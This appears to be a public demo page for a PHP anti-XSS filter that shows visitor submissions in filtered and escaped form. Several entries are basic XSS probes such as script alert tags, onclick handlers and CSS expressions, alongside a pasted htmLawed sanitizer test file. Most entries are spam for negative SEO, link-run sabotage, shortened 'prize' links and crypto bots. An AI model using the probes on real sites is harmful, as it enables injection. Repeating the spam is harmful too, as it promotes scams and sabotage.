Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Greetings\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

Greetings\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

keyword(s):

description: Hi there\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

by Ryder Gain | at 2022-06-24 20:47:22


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, did you know that there are 241,120 internet directories in the world. \\r\\n\\r\\nThese websites are what drive traffic to YOUR business.\\r\\n\\r\\nWant more traffic? Want more Sales? We can help - today.\\r\\n\\r\\nYour website anti-xss-demo.suckup.de is listed in only 7 of these directories. \\r\\n\\r\\nGet more traffic for your Germany audience.\\r\\n\\r\\nOur automated system adds your website to all of the directories.\\r\\n\\r\\nYou can find it here: getlisted.directory/anti-xss-demo.suckup.de\\r\\n\\r\\nAct today, and we will expedite your listings and waive the processing charge!

result with twig: {{ xss.xss | escape }}:

Hello, did you know that there are 241,120 internet directories in the world. \\r\\n\\r\\nThese websites are what drive traffic to YOUR business.\\r\\n\\r\\nWant more traffic? Want more Sales? We can help - today.\\r\\n\\r\\nYour website anti-xss-demo.suckup.de is listed in only 7 of these directories. \\r\\n\\r\\nGet more traffic for your Germany audience.\\r\\n\\r\\nOur automated system adds your website to all of the directories.\\r\\n\\r\\nYou can find it here: getlisted.directory/anti-xss-demo.suckup.de\\r\\n\\r\\nAct today, and we will expedite your listings and waive the processing charge!

keyword(s):

description: Hello, did you know that there are 241,120 internet directories in the world. \\r\\n\\r\\nThese websites are what drive traffic to YOUR business.\\r\\n\\r\\nWant more traffic? Want more Sales? We can help - today.\\r\\n\\r\\nYour website anti-xss-demo.suckup.de is listed in only 7 of these directories. \\r\\n\\r\\nGet more traffic for your Germany audience.\\r\\n\\r\\nOur automated system adds your website to all of the directories.\\r\\n\\r\\nYou can find it here: getlisted.directory/anti-xss-demo.suckup.de\\r\\n\\r\\nAct today, and we will expedite your listings and waive the processing charge!

by Monroe Timbery | at 2022-06-23 21:35:37


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

►►► ✅ Where can I get my prize? Here? https://u.to/pHYyHA

result with twig: {{ xss.xss | escape }}:

►►► ✅ Where can I get my prize? Here? https://u.to/pHYyHA

keyword(s):

description: ►►► ✅ Where can I pick up my prize? Here? https://u.to/pHYyHA

by Chelsey Byles | at 2022-06-23 20:54:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nLatosha

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nLatosha

keyword(s):

description: Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nLatosha

by Latosha Cerda | at 2022-06-22 09:18:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Would you like to send targeted messages to website owners, just like this one?\\r\\n\\r\\nContact Page Marketing.. \\r\\n\\r\\nWe will deliver your message to website owners, excellent for B2B products.\\r\\n\\r\\nhttps://cutt.ly/ChatToUs

result with twig: {{ xss.xss | escape }}:

Would you like to send targeted messages to website owners, just like this one?\\r\\n\\r\\nContact Page Marketing.. \\r\\n\\r\\nWe will deliver your message to website owners, excellent for B2B products.\\r\\n\\r\\nhttps://cutt.ly/ChatToUs

keyword(s):

description: Would you like to send targeted messages to website owners, just like this one?\\r\\n\\r\\nContact Page Marketing.. \\r\\n\\r\\nWe will deliver your message to website owners, excellent for B2B products.\\r\\n\\r\\nhttps://cutt.ly/ChatToUs

by Jasper Rackley | at 2022-06-22 05:08:08


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

%3cscript%3ealert(\\\'XSS\\\')%3c/script%3e

keyword(s): teste

description: teste

by teste | at 2022-06-21 20:43:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'123\\\')</script>

keyword(s): test

description:

by test | at 2022-06-20 08:03:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dawd

result with twig: {{ xss.xss | escape }}:

dawd

keyword(s): awdaw

description: dawdwa

by awd | at 2022-06-19 21:29:41


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dsds

result with twig: {{ xss.xss | escape }}:

dsds

keyword(s): 2

description: <a>Bonjour</a>

by 2 | at 2022-06-17 12:00:22


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

noir

result with twig: {{ xss.xss | escape }}:

noir

keyword(s): test

description: Bonjour

by test | at 2022-06-17 11:59:21


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): test

description: test

by test | at 2022-06-17 11:57:20


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Добрый день! \\r\\nДелаем прекрасное предложение: лучшие прогоны, чтобы \\\"утопить\\\" сайты ваших конкурентов. Стоимость: от 2 тыс руб. \\r\\n- 100% эффект. Сайты точно \\\"умрут\\\". \\r\\n- Предельно возможное число негативных фитбеков. \\r\\n- Собрана специфическая база - выжимка самых сильных площадок из 10 000 000 сайтов (порно, вирусных, спамных и тому подобных). Работает бесперебойно. \\r\\n- Прогон выполняем сразу с четырех мощных серверов. \\r\\n- Безостановочная отправка активационных ссылок на email. \\r\\n- Выполнение на протяжении 40-240 часов 24/7. Можем растянуть по времени как угодно. \\r\\n- Прогоняем с запрещёнными ключами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

result with twig: {{ xss.xss | escape }}:

Добрый день! \\r\\nДелаем прекрасное предложение: лучшие прогоны, чтобы \\\"утопить\\\" сайты ваших конкурентов. Стоимость: от 2 тыс руб. \\r\\n- 100% эффект. Сайты точно \\\"умрут\\\". \\r\\n- Предельно возможное число негативных фитбеков. \\r\\n- Собрана специфическая база - выжимка самых сильных площадок из 10 000 000 сайтов (порно, вирусных, спамных и тому подобных). Работает бесперебойно. \\r\\n- Прогон выполняем сразу с четырех мощных серверов. \\r\\n- Безостановочная отправка активационных ссылок на email. \\r\\n- Выполнение на протяжении 40-240 часов 24/7. Можем растянуть по времени как угодно. \\r\\n- Прогоняем с запрещёнными ключами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

keyword(s):

description: Добрый день! \\r\\nГотовы предоставить самые лучшие \\\"смертоносные\\\" прогоны для веб-сайтов конкурентов. Стоимость: от 2 000 руб. \\r\\n- Гарантированный результат. Онлайн-сайты точно \\\"умрут\\\". \\r\\n- Наибольшее число отрицательных фитбеков. \\r\\n- Собрана специфическая база - выжимка максимально \\\"смертельных\\\" площадок из 10 млн. веб-сайтов (порно, вирусные, спам и так далее). Это работает безотказно. \\r\\n- Прогон производится одновременно с 4 серверов. \\r\\n- Непрекращающаяся отправка токсичных ссылок на официальный e-mail. \\r\\n- Выполнение на протяжении 40-240 часов. Можем растянуть по времени сколько угодно. \\r\\n- Прогоняем с запретными ключами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

by Petr Velkov | at 2022-06-17 06:15:33


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

est htmLawed\\\\\\\\r\\\\\\\\nCopyright Santosh Patnaik\\\\\\\\r\\\\\\\\nDual licensed with LGPL 3 and GPL 2+\\\\\\\\r\\\\\\\\nA PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed\\\\\\\\r\\\\\\\\n*/\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n************************************************\\\\\\\\r\\\\\\\\nwhen viewing this file in a web browser, set the\\\\\\\\r\\\\\\\\ncharacter encoding to Unicode/UTF-8\\\\\\\\r\\\\\\\\n************************************************\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n--------------------- start --------------------\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nTry different $config and $spec values. Some text even when filtered in will not be displaye

result with twig: {{ xss.xss | escape }}:

est htmLawed\\\\\\\\r\\\\\\\\nCopyright Santosh Patnaik\\\\\\\\r\\\\\\\\nDual licensed with LGPL 3 and GPL 2+\\\\\\\\r\\\\\\\\nA PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed\\\\\\\\r\\\\\\\\n*/\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n************************************************\\\\\\\\r\\\\\\\\nwhen viewing this file in a web browser, set the\\\\\\\\r\\\\\\\\ncharacter encoding to Unicode/UTF-8\\\\\\\\r\\\\\\\\n************************************************\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n--------------------- start --------------------\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nTry different $config and $spec values. Some text even when filtered in will not be displaye

keyword(s): s

description: s

by a | at 2022-06-16 09:52:09


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

/*\\r\\nhtmLawed_TESTCASE.txt, 10 April 2022\\r\\nTo test htmLawed\\r\\nCopyright Santosh Patnaik\\r\\nDual licensed with LGPL 3 and GPL 2+\\r\\nA PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed\\r\\n*/\\r\\n\\r\\nThis file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.\\r\\n\\r\\n************************************************\\r\\nwhen viewing this file in a web browser, set the\\r\\ncharacter encoding to Unicode/UTF-8\\r\\n************************************************\\r\\n\\r\\n--------------------- start --------------------\\r\\n\\r\\nTry different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page
\\r\\n\\r\\n
Attributes
\\r\\n\\r\\nXml:lang:, ,
\\r\\nStandard, predefined value, or empty attribute: <input type=\\\"text\\\" disabled />, <input type=\\\"text\\\" disabled=\\\"DISABLED\\\" />, <input type=\\\"text\\\" disabled=\\\"1\\\" />
\\r\\nRequired: , & x="+urn:schemas-microsoft-com:office:office\\\"

result with twig: {{ xss.xss | escape }}:

/*\\r\\nhtmLawed_TESTCASE.txt, 10 April 2022\\r\\nTo test htmLawed\\r\\nCopyright Santosh Patnaik\\r\\nDual licensed with LGPL 3 and GPL 2+\\r\\nA PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed\\r\\n*/\\r\\n\\r\\nThis file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.\\r\\n\\r\\n************************************************\\r\\nwhen viewing this file in a web browser, set the\\r\\ncharacter encoding to Unicode/UTF-8\\r\\n************************************************\\r\\n\\r\\n--------------------- start --------------------\\r\\n\\r\\n<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />\\r\\n\\r\\n<h6>Attributes</h6>\\r\\n\\r\\n<strong>Xml:lang:</strong><a lang=\\\"en\\\" xml:lang=\\\"en\\\"></a>, <a lang=\\\"en\\\"></a>, <a xml:lang=\\\"en\\\"></a><br />\\r\\n<strong>Standard, predefined value, or empty attribute:</strong> <input type=\\\"text\\\" disabled />, <input type=\\\"text\\\" disabled=\\\"DISABLED\\\" />, <input type=\\\"text\\\" disabled=\\\"1\\\" /><br />\\r\\n<strong>Required:</strong> <img />, <img alt=\\\"image\\\" /><br />\\r\\n<strong>Quote & space variation:</strong> <a id=id1 name=xy>a</a>, <a id=\\\'id2\\\' name=\\\"xy\\\">a</a>, <a id=\\\' id3 \\\' name = \\\"n\\\" >a</a><br />\\r\\n<strong>Invalid:</strong> <a id=\\\"id4\\\" src=\\\"s\\\">a</a><br />\\r\\n<strong>Duplicated:</strong> <a id=\\\"id5\\\" id=\\\"id6\\\">a</a><br />\\r\\n<strong>Deprecated:</strong> <a id=\\\"id7\\\" target=\\\"self\\\" name=\\\"n\\\">a</a>, <hr noshade=\\\"noshade\\\" /><br />\\r\\n<strong>Casing:</strong> <a HREF=\\\"\\\"></a><br />\\r\\n<strong>Custom:</strong> <img alt=\\\"image\\\" my:data=\\\"portrait\\\" /><br />\\r\\n<strong>Data-*:</strong> <a data-xml=\\\"x\\\" data-xmnt=\\\"x\\\" data-xmlnt=\\\"x\\\" data-xmn:t=\\\"x\\\" data-12=\\\"x\\\" data-רש=\\\"x\\\" data-xmxm=\\\"x\\\">a</a><br />\\r\\n<strong>Admin-restricted?:</strong> <a href=\\\"x\\\" onclick=\\\"alert();\\\"></a>\\r\\n\\r\\n<h6>Attribute values</h6>\\r\\n\\r\\n<strong>Duplicate ID value:</strong><a id=\\\"id8\\\"></a>, <a id=\\\"my_id8\\\"></a>, <a id=\\\"id8\\\"></a><br />\\r\\n(try \\\'my_\\\' for prefix)<br />\\r\\n<strong>Double-quotes in value:</strong><a title=ab\\\"c\\\"></a>, <a title=\\\"ab\\\"c\\\"></a>, <a title=\\\'ab\\\"c\\\'></a><br />\\r\\n(try filter for CSS expression)<br />\\r\\n<strong>CSS expression</strong>: <div style=\\\"prop:expression();\\\"></div><div style=\\\"prop:expression()\\\"></div><div style=\\\"prop: expression();\\\"></div><div style=\\\"prop : expression()\\\"></div><div style=\\\"prop:expression(js);\\\"></div><div style=\\\"prop:expression(js;)\\\"></div><div style=\\\"prop: expression(\\\'js\\\');\\\"></div><div style=\\\"prop : expr ession(\\\'js\\\':)\\\"></div><div style=\\\"prop&#x3a;expression( \\\'js&#x40; );\\\"></div><br />\\r\\n<strong>Other:</strong> <input size=\\\"50\\\" class=\\\"my\\\" value=\\\"an input an input an input\\\" />, <input size=\\\"5\\\" class=\\\"your\\\" value=\\\"an input\\\" /><br />\\r\\n(try \\\'maxlen\\\', \\\'maxval\\\', etc., for \\\'input\\\' in \\\'$spec\\\')\\r\\n\\r\\n<h6>Blockquotes</h6>\\r\\n\\r\\n<blockquote>abc</blockquote><br />\\r\\n<blockquote>abc<div>def</div></blockquote><br />\\r\\n<blockquote><div>abc</div>def</blockquote><br />\\r\\n<blockquote>abc<div>def</div>ghi</blockquote><br />\\r\\nabc<div>def</div>ghi<br />\\r\\n<blockquote>QQQ<div>x</div><!-- comment --></blockquote><br />\\r\\n<blockquote><div>x</div><!-- comment -->QQQ</blockquote><br />\\r\\n<blockquote><!-- comment --><div>x</div>QQQ<div>x</div></blockquote><br />\\r\\n<blockquote><div>x<!-- comment --></div>QQQ</blockquote><p>x</p><br />\\r\\n<br />\\r\\n(try with blockquote parent)\\r\\n\\r\\n<h6>CDATA sections</h6>\\r\\n\\r\\n<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 &gt; 4 ]]><br />\\r\\n<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br />\\r\\n<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br />\\r\\n<strong>Invalid:</strong> <em <![CDATA[ check ]]>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table>\\r\\n\\r\\n<h6>Complex-1: deprecated elements</h6>\\r\\n\\r\\n<center>\\r\\nThe PHP <s>software</s> script used for this <strike>web-page</strike> webpage is <font style=\\\"font-weight: bold \\\" face=arial size=\\\'+3\\\' color = \\\"red \\\">htmLawedTest.php</font>, from <u style= \\\'color:green\\\'>PHP Labware</u>.\\r\\n</center>\\r\\n\\r\\n<h6>Complex-2: deprecated attributes</h6>\\r\\n\\r\\n<img src=\\\"s\\\" alt=\\\"a\\\" name=\\\"n\\\" /><img src=\\\"s\\\" alt=\\\"a\\\" id=\\\"id9\\\" name=\\\"n\\\" />\\r\\n<br clear=\\\"left\\\" />\\r\\n<hr noshade size=\\\"1\\\" />\\r\\n<img name=\\\"id10\\\" src=\\\"s\\\" align=\\\"left\\\" alt=\\\"image\\\" hspace=\\\"10\\\" vspace=\\\"10\\\" width=\\\"10em\\\" height=\\\"20\\\" border=\\\"1\\\" style=\\\"padding:5px;\\\" />\\r\\n<table width=\\\"50em\\\" align=\\\"center\\\" bgcolor=\\\"red\\\">\\r\\n <tr>\\r\\n <td width=\\\"20%\\\">\\r\\n <div align=\\\"center\\\">\\r\\n <h3 align=\\\"right\\\">Section</h3>\\r\\n <p align=\\\"right\\\">Para</p>\\r\\n <ol type=\\\"a\\\" start=\\\"e\\\"><li value=\\\"x\\\"><a name=\\\"x\\\">First</a> <a name=\\\"x\\\" id=\\\"id11\\\">item</a></li></ol>\\r\\n </div>\\r\\n </td>\\r\\n <td width=\\\"*\\\">\\r\\n <ol type=\\\"1\\\"><li>First item</li></ol>\\r\\n </td>\\r\\n </tr>\\r\\n </table>\\r\\n<br clear=\\\"all\\\" />\\r\\n\\r\\n<h6>Complex-3: embed, object, area</h6>\\r\\n\\r\\n<object width=\\\"425\\\" height=\\\"350\\\"><param name=\\\"movie\\\" value=\\\"http://www.youtube.com/v/ls7gi1VwdIQ\\\"></param><embed src=\\\"http://www.youtube.com/v/ls7gi1VwdIQ\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"425\\\" height=\\\"350\\\"></embed></object><br />\\r\\n\\r\\n<embed src=\\\"http://www.youtube.com/v/ls7gi1VwdIQ\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"425\\\" height=\\\"350\\\"></embed><br />\\r\\n\\r\\n<object data=\\\"1.gif\\\" type=\\\"image/gif\\\" usemap=\\\"#map1\\\"><map name=\\\"map1\\\">\\r\\n<p>navigate the site: <a href=\\\"1\\\" shape=\\\"REct\\\" coOrds=\\\"0,0,118,28\\\">1</a> | <a href=\\\"3\\\" shape=\\\"circle\\\" coords=\\\"184,200,60\\\">3</a> | <a href=\\\"4\\\" shape=\\\"poly\\\" coords=\\\"276,0,276,28,100,200,50,50,276,0\\\">4</a></p>\\r\\n<area href=\\\"5\\\" shape=\\\"Rect\\\" coords=\\\"0,0,118,28\\\">\\r\\n</map></object>\\r\\n\\r\\n<param name=\\\"name\\\">value</param>\\r\\n\\r\\n<object id=\\\"obj1\\\">\\r\\n <param name=\\\"param1\\\">\\r\\n <object id=\\\"obj2\\\">\\r\\n <param name=\\\"param2\\\">\\r\\n </object>\\r\\n</object>\\r\\n\\r\\n<h6>Complex-4: nested and other tables</h6>\\r\\n\\r\\n<table border=\\\"1\\\" bgcolor=\\\"red\\\"> <tr> <td> Cell </td> <td colspan=\\\"2\\\" rowspan=\\\"2\\\"> <table border=\\\"1\\\" bgcolor=\\\"green\\\"> <tr> <td> Cell </td> <td colspan=\\\"2\\\" rowspan=\\\"2\\\"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />\\r\\n<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />\\r\\n<strong>Missing tr:</strong> <table><td>Well</td></table><br />\\r\\n\\r\\n<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>\\r\\n\\r\\n(Try different \\\'keep_bad\\\' values)\\r\\n<*> Pseudotags <*>\\r\\n<xml>Non-HTML tag xml</xml>\\r\\n<p>\\r\\nDisallowed tag p\\r\\n</p>\\r\\n<ul>Bad<li>OK</li></ul>\\r\\n\\r\\n<h6>Elements</h6>\\r\\n\\r\\n<strong>Unbalanced:</strong> <a href=\\\"h\\\"><em>check</a></em><br />\\r\\n<strong>Non-XHTML:</strong> <div><center><dir></dir></center></div><br />\\r\\n<strong>Malformed:</strong> < a href=\\\"\\\"></a>, <a href=\\\"\\\" ></a>, <a href=\\\"\\\" ></a>, <a href=\\\"\\\"\\r\\n></a>, <a href=\\\"\\\">< /a>, < a href=\\\"\\\"></a >, <img src=\\\"s\\\" alt=\\\"a\\\" />, <img src=\\\"s\\\" alt=\\\"a\\\"/ >, <imgsrc=\\\"s\\\" alt=\\\"a\\\" /><br />\\r\\n<strong>Invalid:</strong> <image src=\\\"s\\\" alt=\\\"a\\\" /><br />\\r\\n<strong>Empty:</strong> <img src=\\\"s\\\" alt=\\\"a\\\" />, <img src=\\\"s\\\" alt=\\\"a\\\"></img>, <img src=\\\"s\\\" alt=\\\"a\\\">text</img><br />\\r\\n<strong>Content invalid:</strong> <a href=\\\"h\\\">1<a>2</a></a><br />\\r\\n<strong>Content invalid?:</strong> <form></form><br /> (try setting \\\'form\\\' as parent)<br />\\r\\n<strong>Casing:</strong> <A href=\\\"\\\"></a><br />\\r\\n<strong>Check for tidy:</strong> <br /><hr /></div><hr /></div><hr /></div><div>hi</div>\\r\\n<strong>Customized element: </strong><button is=\\\"plastic-button\\\">Click Me!</button>\\r\\n<strong>Custom element:</strong> <plastic-button>Click me?</plastic-button><img-viewer filter=\\\"Kelvin\\\"><img src=\\\"images/tree.jpg\\\" alt=\\\"A beautiful tree towering over an empty savannah\\\"></img-viewer>\\r\\n<strong>Custom element:</strong> <share-buttons>\\r\\n <social-button type=\\\"fb\\\"><a href=\\\"...\\\">Facebook</a></social-button>\\r\\n <social-button type=\\\"plus\\\" myattr=\\\"social\\\"><a href=\\\"...\\\">G+</a></social-button>\\r\\n <emotion-😍>xx<emotion-😍>\\r\\n </share-buttons>\\r\\n\\r\\n<strong>Math:</strong> <math xmlns = \\\"http://www.w3.org/1998/Math/MathML\\\"><mrow>2<mo> = </mo>2</mrow></math>\\r\\n<strong>SVG:</strong> <svg viewBox=\\\"0 0 10 10\\\" x=\\\"200\\\" width=\\\"100\\\"><circle cx=\\\"5\\\" cy=\\\"5\\\" r=\\\"4\\\" /></svg>\\r\\n\\r\\n<h6>Entities</h6>\\r\\n\\r\\n<strong>Special:</strong> &amp; 3 < 2 & 5>4 and j >i >a & i<j>a<br />\\r\\n<strong>Padding:</strong> &#00066; &#066; &#x00066; &#x066; &#x003; &#0003;<br />\\r\\n<strong>Malformed:</strong> & #x27;, &x27;, &#x27; &TILDE;, &tilde<br />\\r\\n<strong>Invalid:</strong> &#x3;, &#55296;, &#03;, &#1114112;, &#xffff, &bad;<br />\\r\\n<strong>Discouraged characters:</strong> &#x7f;, &#132;, &#64992;, &#1114110;<br />\\r\\n<strong>Context:</strong> \\\'&gt;\\\', &lt;?<br />\\r\\n<strong>Casing:</strong> &#X27;, &#x27;, &TILDE;, &tilde;\\r\\n<br />\\r\\n(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)\\r\\n\\r\\n<h6>Format</h6>\\r\\n\\r\\n<strong>Valid but ill-formatted:</strong> text <!-- comment -->\\r\\ntext <!--\\r\\nA c o m m e n t -->\\r\\n<script>\\r\\n <![CDATA[\\r\\n code\\r\\n ]]>\\r\\n</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id=\\\"none\\\">p r e</pre>\\r\\n<textarea>text</textarea> <textarea>\\r\\n text text \\r\\n</textarea> text text <br /><hr />\\r\\ntext <img src=\\\"none\\\" alt=\\\"none\\\" /> t<em class=\\\"none\\\">e<strong>x</strong>t</em>\\r\\ntext <img src=\\\"none\\\" alt=\\\"none\\\" /> <b>t<em> e <strong> x </strong> t</em></b>\\r\\n <a href=\\\"a\\\"> text <img src=\\\"none\\\" alt=\\\"none\\\" /> <b>t <em> e <strong> x </strong> t</em></b>\\r\\n </a>\\r\\n<span style=\\\"background-color: yellow;\\\">text <img src=\\\"none\\\" alt=\\\"none\\\" /> <b> <em> t e <strong> x </strong> t</em></b></span>\\r\\n<script>script</script>\\r\\n<div>\\r\\n <pre id=\\\"none\\\">p <a>r</a> e <!-- comment --> </pre>\\r\\n <pre>\\r\\n pre\\r\\n </pre>\\r\\n</div>\\r\\n<div><div><table border=\\\"1\\\" style=\\\"background-color: red;\\\"><tr><td>Cell</td><td colspan=\\\"2\\\" rowspan=\\\"2\\\"><table border=\\\"1\\\" style=\\\"background-color: green;\\\"><tr><td>Cell</td><td colspan=\\\"2\\\" rowspan=\\\"2\\\"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>\\r\\n(try to compact or beautify)\\r\\n\\r\\n<h6>Forms</h6>\\r\\n\\r\\n(note nesting of \\\'form\\\', missing required attributes, etc.)<br />\\r\\n<form>\\r\\n<script type=\\\"text/javascript\\\">s</script>\\r\\n<fieldset><legend>p</legend>l <input name=\\\"personal_lastname\\\" type=\\\"text\\\" tabindex=\\\"1\\\"></fieldset>\\r\\n<input name=\\\"h\\\" type=\\\"checkbox\\\" value=\\\"h\\\" tabindex=\\\"20\\\"> h\\r\\n<textarea name=\\\"t\\\">t</textarea>\\r\\n<form action=\\\"a\\\" method=\\\"get\\\"></form></form><br />\\r\\n<form action=\\\"b\\\" method=\\\"get\\\"><p><input type=\\\"text\\\" value=\\\"i\\\" /></form><br />\\r\\n<form>B:<input type=\\\"text\\\" value=\\\"b\\\" />C:<input type=\\\"text\\\" value=\\\"c\\\" /></form><br />\\r\\n(try each of these lines separately)<br />\\r\\n<form action=\\\"a\\\">what<br />\\r\\n<form action=\\\"a\\\">what\\r\\n(try with container as div and as form)<br />\\r\\n<form>c <a>a</a> <b>b</b><input /><script>s</script>\\r\\n\\r\\n<h6>HTML comments (also CDATA)</h6>\\r\\n\\r\\n<strong>Script inside:</strong> <!--[if gte IE 4]>\\r\\n<SCRIPT>alert(\\\'XSS\\\');</SCRIPT>\\r\\n<![endif]--><br />\\r\\n<strong>Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 &gt; 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br />\\r\\n<strong>Normal:</strong> <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br />\\r\\n<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br />\\r\\nInvalid:</strong> <em <!-- check -->>comment in tag content</em>, <!--check-->\\r\\n\\r\\n<h6>HTML5</h6>\\r\\n\\r\\n<strong>figure and figcaption:</strong> <figure><img src=\\\"picture.jpg\\\" alt=\\\"picture\\\"><figcaption>Caption for the awesome picture</figcaption></figure>\\r\\n<strong>article:</strong> <h1>A</h1><p>B</p><article><h2>C</h2></article><article><h2>E</h2><p>F</p><p>G</p></article>\\r\\n<strong>meter</strong>: <p>Heat <meter min=\\\"100\\\" max=\\\"200\\\" value=\\\"150\\\">150</meter>.</p>\\r\\n<strong>datalist</strong>: <input list=\\\"b\\\" /><datalist id=\\\"b\\\"><option value=\\\"c\\\"><option value=\\\"d\\\"></datalist>\\r\\n\\r\\n<h6>Ins-Del</h6>\\r\\n\\r\\n(depending on context, these elements can be of either block or inline type)<br />\\r\\n<p><ins datetime=\\\"d\\\" cite=\\\"c\\\"><div>block</div></ins></p><br />\\r\\n<p><del>d</del></p><br 